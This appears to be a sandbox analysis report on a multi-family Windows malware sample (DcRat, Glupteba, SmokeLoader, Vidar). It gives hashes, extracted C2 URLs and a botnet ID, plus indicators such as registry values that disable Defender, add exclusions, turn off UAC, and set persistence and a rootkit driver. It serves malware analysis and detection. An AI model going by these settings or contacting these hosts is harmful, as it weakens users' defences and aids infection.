dcrat | 919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

Analysis

max time kernel
148s
max time network
151s
platform
windows7_x64
resource
win7-20231023-en
resource tags

arch:x64arch:x86image:win7-20231023-enlocale:en-usos:windows7-x64system
submitted
01-12-2023 15:49

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

418KB
MD5

0099a99f5ffb3c3ae78af0084136fab3
SHA1

0205a065728a9ec1133e8a372b1e3864df776e8c
SHA256

919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226
SHA512

5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6
SSDEEP

12288:5noAx+FnmuQhimtPURimLqevmipum+K4Y:5+FnmuGtpMLnLYY

Score

10^/10

dcrat glupteba smokeloader vidar b38cb04787049a109b9655c2379f5b97 up3 backdoor discovery dropper evasion infostealer loader persistence rat rootkit spyware stealer trojan upx

Malware Config

Extracted

Family

smokeloader

Botnet

up3

Extracted

Family

smokeloader

Version

2020

http://host-file-host6.com/

http://host-host-file8.com/

rc4.i32

Extracted

Family

vidar

Version

6.7

Botnet

b38cb04787049a109b9655c2379f5b97

https://t.me/s4p0g

https://steamcommunity.com/profiles/76561199575355834

Attributes

profile_id_v2
b38cb04787049a109b9655c2379f5b97

Signatures

DcRat 10 IoCs

DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

rat infostealer dcrat

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeozhNpD8L2lpu5PbPP1O3mZf8.exee0cbefcb1af40c7d4aff4aca26621a98.exeschtasks.exeschtasks.exeschtasks.exe

pid	process
2272	schtasks.exe
1496	schtasks.exe
2676	schtasks.exe
3008	schtasks.exe
1972	schtasks.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	ozhNpD8L2lpu5PbPP1O3mZf8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	e0cbefcb1af40c7d4aff4aca26621a98.exe
1756	schtasks.exe
2924	schtasks.exe
1328	schtasks.exe

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 23 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2536-127-0x0000000002AD0000-0x00000000033BB000-memory.dmp	family_glupteba
behavioral1/memory/2536-130-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2536-166-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2536-297-0x0000000002AD0000-0x00000000033BB000-memory.dmp	family_glupteba
behavioral1/memory/2536-321-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1576-329-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1576-344-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2536-351-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2472-371-0x00000000009E0000-0x00000000010D4000-memory.dmp	family_glupteba
behavioral1/memory/3060-377-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2284-376-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1576-379-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/3060-428-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2284-429-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2284-456-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1740-475-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/3060-488-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1740-533-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1788-538-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1788-573-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/1740-577-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba
behavioral1/memory/2472-578-0x00000000009E0000-0x00000000010D4000-memory.dmp	family_glupteba
behavioral1/memory/2684-582-0x0000000000400000-0x0000000000D1C000-memory.dmp	family_glupteba

Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1"	reg.exe

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

Random.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" Random.exe
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Random.exe

Windows security bypass 2 TTPs 50 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exee0cbefcb1af40c7d4aff4aca26621a98.exereg.exereg.exereg.exereg.exereg.exereg.exeozhNpD8L2lpu5PbPP1O3mZf8.exeRandom.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bNnrUnNDEAUn = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BNryKJlvyfNIwlGQWmR = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\irkXhMdeLQacOymC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\irkXhMdeLQacOymC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rOjhPdXEWkouC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\KTXWpTWPOIyzLnVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\guxeHrySFRRzTNNVB = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\bNnrUnNDEAUn = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\rOjhPdXEWkouC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ozhNpD8L2lpu5PbPP1O3mZf8.exe = "0"	ozhNpD8L2lpu5PbPP1O3mZf8.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WxaPJuQkjkNU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kZAwWSvkU = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	Random.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000017001\Random.exe = "0"	Random.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\WxaPJuQkjkNU2 = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\KTXWpTWPOIyzLnVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\guxeHrySFRRzTNNVB = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\irkXhMdeLQacOymC = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BNryKJlvyfNIwlGQWmR = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\irkXhMdeLQacOymC = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kZAwWSvkU = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\e0cbefcb1af40c7d4aff4aca26621a98.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe

Modifies boot configuration data using bcdedit 14 IoCs

Processes:

bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exe

pid	process
1564	bcdedit.exe
1716	bcdedit.exe
1812	bcdedit.exe
2900	bcdedit.exe
1876	bcdedit.exe
3044	bcdedit.exe
912	bcdedit.exe
2912	bcdedit.exe
2080	bcdedit.exe
1552	bcdedit.exe
572	bcdedit.exe
1296	bcdedit.exe
2992	bcdedit.exe
1948	bcdedit.exe

Downloads MZ/PE file
Drops file in Drivers directory 1 IoCs

Processes:

csrss.exe

description ioc process

File created C:\Windows\system32\drivers\Winmon.sys csrss.exe
Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Processes:

netsh.exenetsh.exe

pid process

2748 netsh.exe
3044 netsh.exe
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
evasion

Impair Defenses
T1562

Command and Scripting Interpreter
T1059
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.

Query Registry
T1012

System Information Discovery
T1082

Processes:

Install.exe

description ioc process

Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe

description	ioc	process
File created	C:\Windows\system32\drivers\Winmon.sys	csrss.exe

pid	process
2748	netsh.exe
3044	netsh.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Install.exe

Executes dropped EXE 25 IoCs

Processes:

toolspub2.exee0cbefcb1af40c7d4aff4aca26621a98.exeRandom.exetuc3.exetuc3.tmptoolspub2.exevHrBJfp6Ae2TplhspiUC4Z2i.exefXxalfBYclw5CFjedzawENWf.exeozhNpD8L2lpu5PbPP1O3mZf8.exe1WhdhWgOS4WRGRR6OOPxuF3j.exeefvsGwL3XyHtUD0FozEnfzjb.exeefvsGwL3XyHtUD0FozEnfzjb.tmpgRvod0KThFz1hzWY7BmbszEA.exeInstall.exeInstall.exee0cbefcb1af40c7d4aff4aca26621a98.exeozhNpD8L2lpu5PbPP1O3mZf8.execsrss.exe1WhdhWgOS4WRGRR6OOPxuF3j.exepatch.exeinjector.exedsefix.exewindefender.exewindefender.exezjfYIUu.exe

pid	process
3064	toolspub2.exe
2536	e0cbefcb1af40c7d4aff4aca26621a98.exe
1720	Random.exe
2796	tuc3.exe
2816	tuc3.tmp
2876	toolspub2.exe
3032	vHrBJfp6Ae2TplhspiUC4Z2i.exe
1756	fXxalfBYclw5CFjedzawENWf.exe
1576	ozhNpD8L2lpu5PbPP1O3mZf8.exe
3060	1WhdhWgOS4WRGRR6OOPxuF3j.exe
2592	efvsGwL3XyHtUD0FozEnfzjb.exe
2564	efvsGwL3XyHtUD0FozEnfzjb.tmp
1816	gRvod0KThFz1hzWY7BmbszEA.exe
2176	Install.exe
2472	Install.exe
2284	e0cbefcb1af40c7d4aff4aca26621a98.exe
1740	ozhNpD8L2lpu5PbPP1O3mZf8.exe
1788	csrss.exe
2684	1WhdhWgOS4WRGRR6OOPxuF3j.exe
2860	patch.exe
296	injector.exe
828	dsefix.exe
2364	windefender.exe
2300	windefender.exe
1368	zjfYIUu.exe

Loads dropped DLL 52 IoCs

Processes:

tmp.exetoolspub2.exetuc3.exetuc3.tmpAddInProcess32.exefXxalfBYclw5CFjedzawENWf.exeefvsGwL3XyHtUD0FozEnfzjb.exeefvsGwL3XyHtUD0FozEnfzjb.tmpgRvod0KThFz1hzWY7BmbszEA.exeInstall.exeInstall.exee0cbefcb1af40c7d4aff4aca26621a98.exepatch.execsrss.exe

pid	process
2072	tmp.exe
2072	tmp.exe
2072	tmp.exe
2072	tmp.exe
2072	tmp.exe
2072	tmp.exe
3064	toolspub2.exe
2796	tuc3.exe
2816	tuc3.tmp
2816	tuc3.tmp
2816	tuc3.tmp
2816	tuc3.tmp
2288	AddInProcess32.exe
2288	AddInProcess32.exe
2288	AddInProcess32.exe
1756	fXxalfBYclw5CFjedzawENWf.exe
2288	AddInProcess32.exe
2288	AddInProcess32.exe
2288	AddInProcess32.exe
2288	AddInProcess32.exe
1756	fXxalfBYclw5CFjedzawENWf.exe
2288	AddInProcess32.exe
2592	efvsGwL3XyHtUD0FozEnfzjb.exe
2564	efvsGwL3XyHtUD0FozEnfzjb.tmp
2564	efvsGwL3XyHtUD0FozEnfzjb.tmp
2564	efvsGwL3XyHtUD0FozEnfzjb.tmp
2564	efvsGwL3XyHtUD0FozEnfzjb.tmp
2288	AddInProcess32.exe
1816	gRvod0KThFz1hzWY7BmbszEA.exe
1816	gRvod0KThFz1hzWY7BmbszEA.exe
1816	gRvod0KThFz1hzWY7BmbszEA.exe
1816	gRvod0KThFz1hzWY7BmbszEA.exe
2176	Install.exe
2176	Install.exe
2176	Install.exe
2176	Install.exe
2472	Install.exe
2472	Install.exe
2472	Install.exe
2284	e0cbefcb1af40c7d4aff4aca26621a98.exe
2284	e0cbefcb1af40c7d4aff4aca26621a98.exe
848
2860	patch.exe
2860	patch.exe
2860	patch.exe
2860	patch.exe
2860	patch.exe
1788	csrss.exe
2860	patch.exe
2860	patch.exe
2860	patch.exe
1788	csrss.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\fXxalfBYclw5CFjedzawENWf.exe	upx
behavioral1/memory/1756-222-0x0000000000A20000-0x0000000000F48000-memory.dmp	upx
C:\Users\Admin\Pictures\fXxalfBYclw5CFjedzawENWf.exe	upx
\Users\Admin\Pictures\fXxalfBYclw5CFjedzawENWf.exe	upx
\??\c:\users\admin\pictures\fxxalfbyclw5cfjedzawenwf.exe	upx
behavioral1/memory/1756-352-0x0000000000A20000-0x0000000000F48000-memory.dmp	upx

Windows security modification 2 TTPs 11 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

Random.exee0cbefcb1af40c7d4aff4aca26621a98.exeozhNpD8L2lpu5PbPP1O3mZf8.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths	Random.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000017001\Random.exe = "0"	Random.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\e0cbefcb1af40c7d4aff4aca26621a98.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions	Random.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ozhNpD8L2lpu5PbPP1O3mZf8.exe = "0"	ozhNpD8L2lpu5PbPP1O3mZf8.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

e0cbefcb1af40c7d4aff4aca26621a98.exeozhNpD8L2lpu5PbPP1O3mZf8.execsrss.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	e0cbefcb1af40c7d4aff4aca26621a98.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	ozhNpD8L2lpu5PbPP1O3mZf8.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2085049433-1067986815-1244098655-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

Random.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Random.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Random.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMon csrss.exe
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	\??\WinMon	csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 8 IoCs

Processes:

zjfYIUu.exepowershell.EXEpowershell.EXEInstall.exesc.exepowershell.EXE

description	ioc	process
File opened for modification	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	zjfYIUu.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE
File created	C:\Windows\system32\GroupPolicy\gpt.ini	Install.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	sc.exe
File created	C:\Windows\system32\GroupPolicy\Machine\Registry.pol	zjfYIUu.exe
File opened for modification	C:\Windows\system32\GroupPolicy\gpt.ini	zjfYIUu.exe
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.EXE

Suspicious use of SetThreadContext 2 IoCs

Processes:

toolspub2.exeRandom.exe

description	pid	process	target process
PID 3064 set thread context of 2876	3064	toolspub2.exe	toolspub2.exe
PID 1720 set thread context of 2288	1720	Random.exe	AddInProcess32.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 3 IoCs

Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery

T1082

Processes:

ozhNpD8L2lpu5PbPP1O3mZf8.exe1WhdhWgOS4WRGRR6OOPxuF3j.exee0cbefcb1af40c7d4aff4aca26621a98.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	ozhNpD8L2lpu5PbPP1O3mZf8.exe
File opened (read-only)	\??\VBoxMiniRdrDN	1WhdhWgOS4WRGRR6OOPxuF3j.exe
File opened (read-only)	\??\VBoxMiniRdrDN	e0cbefcb1af40c7d4aff4aca26621a98.exe

Drops file in Program Files directory 9 IoCs

Processes:

tuc3.tmpefvsGwL3XyHtUD0FozEnfzjb.tmp

description	ioc	process
File created	C:\Program Files (x86)\xrecode3\install\unins000.dat	tuc3.tmp
File created	C:\Program Files (x86)\xrecode3\stuff\is-J0IH7.tmp	tuc3.tmp
File created	C:\Program Files (x86)\xrecode3\stuff\is-24691.tmp	tuc3.tmp
File created	C:\Program Files (x86)\xrecode3\install\unins001.dat	efvsGwL3XyHtUD0FozEnfzjb.tmp
File created	C:\Program Files (x86)\xrecode3\stuff\is-9VA84.tmp	efvsGwL3XyHtUD0FozEnfzjb.tmp
File created	C:\Program Files (x86)\xrecode3\install\is-T812L.tmp	tuc3.tmp
File created	C:\Program Files (x86)\xrecode3\stuff\is-M5VAN.tmp	tuc3.tmp
File created	C:\Program Files (x86)\xrecode3\install\is-GPPVI.tmp	efvsGwL3XyHtUD0FozEnfzjb.tmp
File created	C:\Program Files (x86)\xrecode3\stuff\is-4E359.tmp	efvsGwL3XyHtUD0FozEnfzjb.tmp

Drops file in Windows directory 8 IoCs

Processes:

csrss.exemakecab.exee0cbefcb1af40c7d4aff4aca26621a98.exeozhNpD8L2lpu5PbPP1O3mZf8.execonhost.exe

description	ioc	process
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File created	C:\Windows\Logs\CBS\CbsPersist_20231201154940.cab	makecab.exe
File opened for modification	C:\Windows\rss	e0cbefcb1af40c7d4aff4aca26621a98.exe
File created	C:\Windows\rss\csrss.exe	e0cbefcb1af40c7d4aff4aca26621a98.exe
File opened for modification	C:\Windows\rss	ozhNpD8L2lpu5PbPP1O3mZf8.exe
File created	C:\Windows\rss\csrss.exe	ozhNpD8L2lpu5PbPP1O3mZf8.exe
File created	C:\Windows\Tasks\bfGojSTCIOPOCXmuYy.job	conhost.exe
File created	C:\Windows\windefender.exe	csrss.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

1372 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1372	sc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

toolspub2.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspub2.exe

Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

